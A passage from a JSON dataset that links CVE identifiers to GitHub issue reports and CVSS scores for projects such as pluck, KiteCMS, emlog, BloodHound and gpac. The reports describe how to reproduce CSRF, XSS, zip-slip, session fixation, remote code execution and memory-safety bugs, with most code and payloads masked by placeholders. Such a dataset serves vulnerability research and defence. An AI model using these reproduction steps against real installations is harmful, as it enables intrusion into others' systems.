        "Repo_new": "quilljs/quill",
        "Issue_Created_At": "2021-05-04T07:56:06Z",
        "description": "Is quill dead?. No updates. Version NUMBERTAG still on development mode. No commits. Is it dead?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3163",
        "Issue_Url_old": "https://github.com/quilljs/quill/issues/3364",
        "Issue_Url_new": "https://github.com/quilljs/quill/issues/3364",
        "Repo_new": "quilljs/quill",
        "Issue_Created_At": "2021-05-11T14:34:05Z",
        "description": "Security Issue CVETAG . Hi. I would like to raise a security issue which is described in CVETAG . Is there any fix for that or do someone know an ETA when that security issue will be fixed? Thanks in advance.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-31663",
        "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/15927",
        "Issue_Url_new": "https://github.com/riot-os/riot/issues/15927",
        "Repo_new": "riot-os/riot",
        "Issue_Created_At": "2021-02-04T13:54:14Z",
        "description": "uri_parser: out of bounds read. Description I did some testing of the APITAG module as provided in APITAG . I believe I discovered an edge case where the parser performs an out of bounds read of the provided buffer. The code causing this is: URLTAG which advances APITAG without a bounds check and even if APITAG is zero APITAG is still advanced by one byte. Steps to reproduce the issue Application code: CODETAG Minimal Makefile : CODETAG Afterwards, compile as: $ make C examples/uri all asan And run the application using: $ make C examples/uri term Expected results The application shouldn't crash. Actual results ERRORTAG Versions I don't think this is needed, if you need more information let me know.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31671",
        "Issue_Url_old": "https://github.com/ankane/pgsync/issues/121",
        "Issue_Url_new": "https://github.com/ankane/pgsync/issues/121",
        "Repo_new": "ankane/pgsync",
        "Issue_Created_At": "2021-04-26T22:09:39Z",
        "description": "Connection security vulnerability with schema sync. CVE Identifier: CVETAG Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact pgsync drops connection parameters when syncing the schema with the APITAG and APITAG options. Some of these parameters may affect security. For instance, if sslmode is dropped, the connection may not use SSL. The first connection parameter is not affected. Here's an example where sslmode is dropped ( APITAG is not affected): APITAG This applies to both the to and from connections. All users running an affected release should upgrade immediately. Credits Thanks to Dmitriy Gunchenko for reporting this.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31676",
        "Issue_Url_old": "https://github.com/lazyphp/PESCMS-TEAM/issues/7",
        "Issue_Url_new": "https://github.com/lazyphp/pescms-team/issues/7",
        "Repo_new": "lazyphp/pescms-team",
        "Issue_Created_At": "2021-04-19T09:20:03Z",
        "description": "There are some vulnerabilities in cms.. Cross Site Request Forgery(CSRF NUMBERTAG modify admin's password ,mail,phone and head image. Technical Description: file : APITAG The function of this file is to Modify personal information,but it don't Verify whether the operation is legal. Through it attackers can modify admin's password ,mail,phone and head image. Proof of APITAG CODETAG FILETAG APITAG the password of admin has been modify. FILETAG Cross Site Request Forgery(CSRF NUMBERTAG Delete the administrator and other member's account number Technical Description: file: APITAG Throught it can delete Any member and administrator just by modify the 'id' that in Url. Delete the Account number of administrator just need to modify the id as NUMBERTAG FILETAG Proof of APITAG CODETAG Visit this page of poc: FILETAG FILETAG We refresh the list of user ,that find that the user that called light is deleted. FILETAG Cross Site Request Forgery(CSRF NUMBERTAG Delete import information Technical Description: file: CODETAG Through CSRF to Delete important data is exist in these files. ALL the delete operations are not verify in front page. Like this: FILETAG Proof of APITAG CODETAG FILETAG refresh: FILETAG And other operations of delete are exist on this cms. Just give the positions,don't prove. FILETAG FILETAG Reflected XSS in PATHTAG In the method of extract, the CSRF also exist , but this is to prove the Rdflected XSS,not CSRF. In line NUMBERTAG the data from $_GET('begin') and $_GET('end') is transfer to variables, and output in pages. FILETAG Proof of APITAG CODETAG FILETAG In this page APITAG XSS can be combined with CSRF,this will cause bigger destruction",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-31684",
        "Issue_Url_old": "https://github.com/netplex/json-smart-v1/issues/10",
        "Issue_Url_new": "https://github.com/netplex/json-smart-v1/issues/10",
        "Repo_new": "netplex/json-smart-v1",
        "Issue_Created_At": "2021-04-16T03:02:06Z",
        "description": "ERRORTAG in parser. The parser fails to throw the ERRORTAG when the parser read the APITAG , the following example input could cause the ERRORTAG APITAG In detail, when the parser tries to find closed single quotation mark using APITAG function, the iteration variable is not sets corretly in line NUMBERTAG URLTAG It shouldn't be the pos to be checked less than len . Instead, the i should be checked. The correct way in line NUMBERTAG is: APITAG Any input with unclosed single quotation mark could trigger this. Like the input of APITAG , cause the ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31684",
        "Issue_Url_old": "https://github.com/netplex/json-smart-v2/issues/67",
        "Issue_Url_new": "https://github.com/netplex/json-smart-v2/issues/67",
        "Repo_new": "netplex/json-smart-v2",
        "Issue_Created_At": "2021-04-16T03:21:57Z",
        "description": "ERRORTAG in parser. Same as URLTAG The code base is at URLTAG It shouldn't be the pos to be checked less than len . Instead, the i should be checked. The correct way in line NUMBERTAG is: APITAG Any input with unclosed single quotation mark could trigger this. Like the input of APITAG , cause the ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31712",
        "Issue_Url_old": "https://github.com/jpuri/react-draft-wysiwyg/issues/1102",
        "Issue_Url_new": "https://github.com/jpuri/react-draft-wysiwyg/issues/1102",
        "Repo_new": "jpuri/react-draft-wysiwyg",
        "Issue_Created_At": "2021-04-14T08:10:28Z",
        "description": "XSS via Link Target. The APITAG library is not filtering the APITAG prefix. XSS can be triggered when someone clicks the link on the draft. This vulnerability can be exploited in a scenario where the draft is shared among different users (such as in a blog/content dashboard). Steps to reproduce NUMBERTAG On URLTAG insert a link NUMBERTAG Set APITAG as Link Target NUMBERTAG Hover the link and click the icon to open the link NUMBERTAG You can see the APITAG is executed under the context of APITAG . Expectation If the link starts with APITAG , don't open it. You can try another rich text editor such as URLTAG for reference. The XSS itself is triggered because of this line URLTAG ( APITAG ). The url should be validated before it reaches that line.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-31731",
        "Issue_Url_old": "https://github.com/Kitesky/KiteCMS/issues/9",
        "Issue_Url_new": "https://github.com/kitesky/kitecms/issues/9",
        "Repo_new": "kitesky/kitecms",
        "Issue_Created_At": "2021-04-21T07:11:29Z",
        "description": "Code execution vulnerability causes RCE NUMBERTAG log into the background of the site url: PATHTAG NUMBERTAG Add vulnerability URL url: PATHTAG Convert to a POST request FILETAG let contract FILETAG NUMBERTAG Access FILETAG generated in the root directory url: APITAG FILETAG Code audit The vulnerability file is located at: PATHTAG > APITAG FILETAG $path and $html We controlled,$rootpath Path splicing And the PATH variable can be passed through .. / directory The variable HTML is written to our PHP code The HTML is decoded, but it has no effect on the PHP code So we can find an existing file to overwrite the writing. POST payload is: PATHTAG APITAG Finally, the command is executed at index.PHP",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.2,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-31737",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/82",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/82",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2021-04-22T09:19:20Z",
        "description": "Remote code execution vulnerability due to upload of database backup file in emlog NUMBERTAG emlog NUMBERTAG The vulnerable file is in \uff1a FILETAG FILETAG Whether version NUMBERTAG or version NUMBERTAG users can back up SQL database in the background FILETAG FILETAG At the same time, users can upload after modifying the database backup file, at this time, we can construct malicious SQL statements in the data to achieve the purpose of writing the shell file FILETAG FILETAG We access the generated specified malicious files to execute the code FILETAG Tested for this bug in both versions",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31745",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/99",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/99",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2021-04-21T03:45:08Z",
        "description": "Pluck NUMBERTAG Session Fixation Vulnerability. Issue Summary A session fixation vulnerability exists within Pluck's administrative login system which can be abused to retain a valid login session even after an administrator has changed their password. Detailed Description It is possible to arbitrarily set the session ID of Pluck's \"PHPSESSID\" cookie. This cookie is used for maintaining administrative login sessions. This can be used in a session fixation attack, for example, to sustain unauthorized access to the CMS after already gaining it through a primary vulnerability. Furthermore, Pluck does not expire sessions in a timely manner nor are sessions bound in any other way. This also allows an easier brute force attack, as it is possible to brute force session IDs without rate limits imposed by the normal login process. APITAG Reproduction Steps NUMBERTAG From Google Chrome, open the developer tools menu, navigate to: Application > Storage > Cookies > APITAG NUMBERTAG Change the value of the \"PHPSESSID\" cookkie to an arbitrary value, such as \"wolf NUMBERTAG Login to the pluck administrative panel, by visiting FILETAG and login to the panel NUMBERTAG On a new browser, repeat steps NUMBERTAG and NUMBERTAG On step NUMBERTAG you will be given access without being prompted for administrative credentials. Impact After any primary exploit has occurred, the session fixation attack can be used in order to sustained unauthorized access. Because Pluck does not invalidate prior sessions after a password change, access can be sustained even after an administrator performs regular remediation attempts such as resetting their password.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31746",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/100",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/100",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2021-04-21T04:09:29Z",
        "description": "Pluck NUMBERTAG Zip Slip Vulnerability. Issue Summary Pluck's module and theme installers are vulnerable to directory traversal (via zip slip). Detailed Description It is possible to upload a malicious zip file in order to traverse directories outside of the intended environment, potentially allowing arbitrary code execution which will run with the permissions of the user assigned to the webserver. Reproduction Steps NUMBERTAG Using the evilarc tool URLTAG , create a zip archive containing a PHP file with a depth of NUMBERTAG APITAG NUMBERTAG isit APITAG and upload the malicious APITAG you created NUMBERTAG isit APITAG and you now have a PHP shell. Impact This vulnerability makes remote code execution under the privileges of the user running the webserver application possible.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31747",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/101",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/101",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2021-04-21T17:59:48Z",
        "description": "Missing SSL Certificate Validation in FILETAG . Issue Summary Pluck's update system deliberately skips SSL certificate validation. Detailed Description Within FILETAG is the following code: APITAG This ensures peer SSL certificates are never valdiated. Impact In theory, this vulnerability can make the Pluck's update system susceptible to Man in the middle attacks.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.5,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-31783",
        "Issue_Url_old": "https://github.com/Piwigo/LocalFilesEditor/issues/2",
        "Issue_Url_new": "https://github.com/piwigo/localfileseditor/issues/2",
        "Repo_new": "piwigo/localfileseditor",
        "Issue_Created_At": "2021-04-23T13:18:54Z",
        "description": "template files display may be used to display external files. Privately reported by Harry Goodman from NCC The APITAG can be used to display unexpected file on the hosting server. We need to make serious checks before any other action.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-31804",
        "Issue_Url_old": "https://github.com/leozide/leocad/issues/645",
        "Issue_Url_new": "https://github.com/leozide/leocad/issues/645",
        "Repo_new": "leozide/leocad",
        "Issue_Created_At": "2021-03-08T04:40:59Z",
        "description": "Use after free when opening a new document. Describe the bug This only happen if APITAG reopen the last document. This need leocad compiled with address sanitizer. Rough patch: CODETAG To Reproduce Steps to reproduce the behavior NUMBERTAG Start leocad with the last document reopened NUMBERTAG File > New NUMBERTAG Crash Expected behavior Shouldn't crash Stack trace ERRORTAG Version (please complete the following information): OS: Linux Fedora NUMBERTAG APITAG Version: git master commit APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-31926",
        "Issue_Url_old": "https://github.com/CubeCoders/AMP/issues/443",
        "Issue_Url_new": "https://github.com/cubecoders/amp/issues/443",
        "Repo_new": "cubecoders/amp",
        "Issue_Created_At": "2021-04-24T12:42:45Z",
        "description": "Can add custom ports without permission. Bug Report System Information Operating System NUMBERTAG amd NUMBERTAG SMP Debian NUMBERTAG APITAG AMP version and build date NUMBERTAG built PATHTAG NUMBERTAG Which AMP release stream you're using Mainline I confirm: FILETAG NUMBERTAG Created a Test user with the following permissions (the user is not member of any group) FILETAG NUMBERTAG Login with a super admin and check the instance ports FILETAG NUMBERTAG Login with the Test user, click on the Minecraft Instance and then APITAG ports\" FILETAG NUMBERTAG Click on the \"+\" in the dialog and then APITAG NUMBERTAG Check again the ports with the super admin FILETAG NUMBERTAG A new port has been added On the step NUMBERTAG if I do APITAG changes\" it will give me this error FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3195",
        "Issue_Url_old": "https://github.com/bitcoin/bitcoin/issues/20866",
        "Issue_Url_new": "https://github.com/bitcoin/bitcoin/issues/20866",
        "Repo_new": "bitcoin/bitcoin",
        "Issue_Created_At": "2021-01-06T10:39:23Z",
        "description": "Restrict RPCs that make server side files. Currently dumpwallet and other RPCs can scribble all over the file system, at least as the user running bitcoind permits. It would be better if these were at the least limited to the data directory, or even a specific directory within the data directory, say, APITAG \u2014to avoid name collisions with wallets, lock files and database files. Overwriting is already prevented.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3200",
        "Issue_Url_old": "https://github.com/openSUSE/libsolv/issues/416",
        "Issue_Url_new": "https://github.com/opensuse/libsolv/issues/416",
        "Repo_new": "opensuse/libsolv",
        "Issue_Created_At": "2020-12-13T05:52:11Z",
        "description": "libsolv \u201ctestcase_read\u201d function a heap overflow vulnerability. Description: There is a heap overflow bug in function: Solver APITAG pool, FILE fp, const char testcase, Queue job, char resultp, int resultflagsp) at src/testcase.c: line NUMBERTAG APITAG The libsolv defines MAPCLR(m, n) as following: APITAG , which means that MAPCLR(pool >considered, p) is same as APITAG The type of variable \u201cpool >considered\u201d is a Map structure. The definition of the structure Map as following: ERRORTAG If the value of the index variable \u201cp NUMBERTAG is bigger than pool >considered >size, there will be a heap buffer overflow bug. Our APITAG file can trigger this bug. Please reproduce this issue through the following APITAG PATHTAG APITAG testcase_read NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: disable: unknown package 'A NUMBERTAG noarch APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG d1 at pc NUMBERTAG f NUMBERTAG a NUMBERTAG b NUMBERTAG e bp NUMBERTAG ffffc NUMBERTAG sp NUMBERTAG ffffc NUMBERTAG READ of size NUMBERTAG at NUMBERTAG d1 thread T NUMBERTAG f NUMBERTAG a NUMBERTAG b NUMBERTAG d in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f NUMBERTAG fa8abf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG d1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f NUMBERTAG be7f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG dba in map_init PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG a in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f NUMBERTAG fa8abf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in testcase_read Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING The ASAN outputs information about this overflow bug. And attacker can use this bug to achieve a APITAG attack. Please reproduce and fix this bug.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32053",
        "Issue_Url_old": "https://github.com/hapifhir/hapi-fhir/issues/2641",
        "Issue_Url_new": "https://github.com/hapifhir/hapi-fhir/issues/2641",
        "Repo_new": "hapifhir/hapi-fhir",
        "Issue_Created_At": "2021-05-06T14:26:38Z",
        "description": "Potential Denial of Service in JPA Server via history operation. A weakness in our handling of FHIR history URLTAG operations has been reported. Specifically, on a server with a very large number of resources, if the history operation is executed by many clients (e.g NUMBERTAG concurrently, the server becomes unresponsive and ultimately consumes a large amount of disk and becomes unstable. Our investigation has revealed that the root cause is a APITAG query that executes at the start of all APITAG operations. Essentially, anytime a APITAG is executed, the server executes NUMBERTAG SQL statements (statements here are approximate NUMBERTAG A APITAG is performed to supply a value for ERRORTAG NUMBERTAG A APITAG is performed to supply the contents The second query is executed against an index and is very fast. The first query by its nature requires a full index scan and is slow. Executing it NUMBERTAG concurrent times quickly overwhelms the database and leads to timeouts, exceptions, and eventually instability. The proposed fix is as follows: A new APITAG setting is added. This setting introduces a \"history count mode\" with NUMBERTAG options: Cached. This is the new default: A loading cache will be used for history counts, meaning that counts are stored in RAM for up to one minute, and the loading cache blocks all but one client thread per JVM from actually performing the count. This effectively throttles access to the database. Not cached. This is the status quo and does exhibit the weakness described here, but may be appropriate in scenarios where users are trusted and accuracy is always required. No count. This setting avoids the count query entirely, saving time and avoiding this weakness at the expense of not including any total in the response. A huge thanks to Zachary Minneker at Security Innovation who discovered and submitted a responsible disclosure of this issue. This issue will be resolved for the upcoming NUMBERTAG release. A CVE number is forthcoming.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-32061",
        "Issue_Url_old": "https://github.com/sa7mon/S3Scanner/issues/122",
        "Issue_Url_new": "https://github.com/sa7mon/s3scanner/issues/122",
        "Repo_new": "sa7mon/s3scanner",
        "Issue_Created_At": "2021-11-28T21:06:52Z",
        "description": "CVETAG : Path Traversal via dump of malicious bucket. tl;dr In version NUMBERTAG and older of APITAG if a user attempts to dump the contents of a bucket which contains objects with special characters in their keys, those characters can be used to save the files outside of the folder specified with APITAG . Thanks I'd like to give a huge thanks to a security researcher named APITAG URLTAG for reporting this issue to me. They provided a detailed explanation and helped walk me through the steps to reproduce. Very excellent experience. The Bug The issue is what's commonly known as a \"path traversal\" vulnerability. In this case, though, it's the ability to save files outside the intended area as opposed to reading files. For example: this bucket was created by APITAG for demonstration purposes. APITAG See how the object keys contain APITAG ? When APITAG goes to download that file, it concatenates the dump directory and this key to form the file path the file should get downloaded to. So if a user ran the following command: APITAG they would end up with a file called APITAG in APITAG which is one level up from where they wanted it. By adding a bunch of these characters together ( APITAG ) an attacker could craft a malicious object key which would place their file anywhere on the APITAG user's system. You may be surprised (like I was) to learn that AWS allows such characters in object keys. Their documentation FILETAG that while you can do this, there are limitations: > ... > > In addition, be aware of the following prefix limitations: > > Objects with a prefix of \"./\" must uploaded or downloaded with the AWS Command Line Interface (AWS CLI), AWS SDKs, or REST API. You cannot use the Amazon S3 console. > > Objects with a prefix of \"../\" cannot be uploaded using the AWS Command Line Interface (AWS CLI) or Amazon S3 console. In the \"real world\" the chances of an APITAG user encountering a bucket with these \"malicious\" keys is very low especially considering I was not able to create such a bucket of my own. This threat poses a fairly low risk since the difficulty of pulling off the attack is a bit high and would only happen if a bad actor was purposely targeting users of this tool. APITAG has engaged MITRE who has reserved CVETAG CVETAG for this vulnerability. The CVE will be updated after this advisory has been posted. Remediation The good news is that I have already pushed the fix for this issue NUMBERTAG If an object to be downloaded has a key that would land outside of the APITAG , the file won't be downloaded. The user will get a message that looks like this: APITAG I'll be drafting the NUMBERTAG release to push out this update across the git repo, APITAG package, and Docker image.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-32074",
        "Issue_Url_old": "https://github.com/hashicorp/vault-action/issues/205",
        "Issue_Url_new": "https://github.com/hashicorp/vault-action/issues/205",
        "Repo_new": "hashicorp/vault-action",
        "Issue_Created_At": "2021-04-20T17:51:47Z",
        "description": "Exposes secrets in plaintext. When using NUMBERTAG actions output secrets in plaintext, here's an example pipeline output APITAG pipeline itself CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3210",
        "Issue_Url_old": "https://github.com/BloodHoundAD/BloodHound/issues/338",
        "Issue_Url_new": "https://github.com/bloodhoundad/bloodhound/issues/338",
        "Repo_new": "bloodhoundad/bloodhound",
        "Issue_Created_At": "2020-06-21T16:20:56Z",
        "description": "XSS in APITAG leading to RCE via imported malicious data file. The help text modal utilizes the React component attribute APITAG when rendering the Info , Abuse Info , etc. texts. E.g. URLTAG This makes the application vulnerable to XSS unless the input parameters are properly sanitized/encoded. It turns out that the parameter APITAG (objectid) isn't encoded, and is reflected in multiple Abuse Info texts making the application vulnerable. URLTAG Since Bloodhound is built using Electron, it is possible to spawn child processes from an XSS vector leading to a RCE vulnerability. By getting the victim to import a malicious data graph file and clicking Help on an edge connected to a malicious node, the XSS payload will trigger. To mitigate this, encoding objectid the same way the node labels are encoded should do the trick. APITAG APITAG I've attached a zip, FILETAG , containing a malicious file, APITAG . APITAG may need to unzip and manually import the JSON file NUMBERTAG Import the file APITAG into APITAG NUMBERTAG Click Help on the edge between APITAG and APITAG NUMBERTAG This should pop APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-32132",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1753",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1753",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-22T08:05:19Z",
        "description": "null dereference issue in APITAG abst_box_size. Hi, There is a null dereference issue in gpac APITAG abst_box_size,this can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32134",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1756",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1756",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-23T00:50:46Z",
        "description": "null dereference in APITAG gf_odf_desc_copy. Hi, There is a null dereference issue in gpac APITAG gf_odf_desc_copy,this can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32135",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1757",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1757",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-23T00:51:46Z",
        "description": "null dereference in APITAG trak_box_size. Hi, There is a null dereference issue in gpac APITAG trak_box_size,this can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32136",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1765",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1765",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-30T00:42:12Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-32137",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1766",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1766",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-04-30T00:43:52Z",
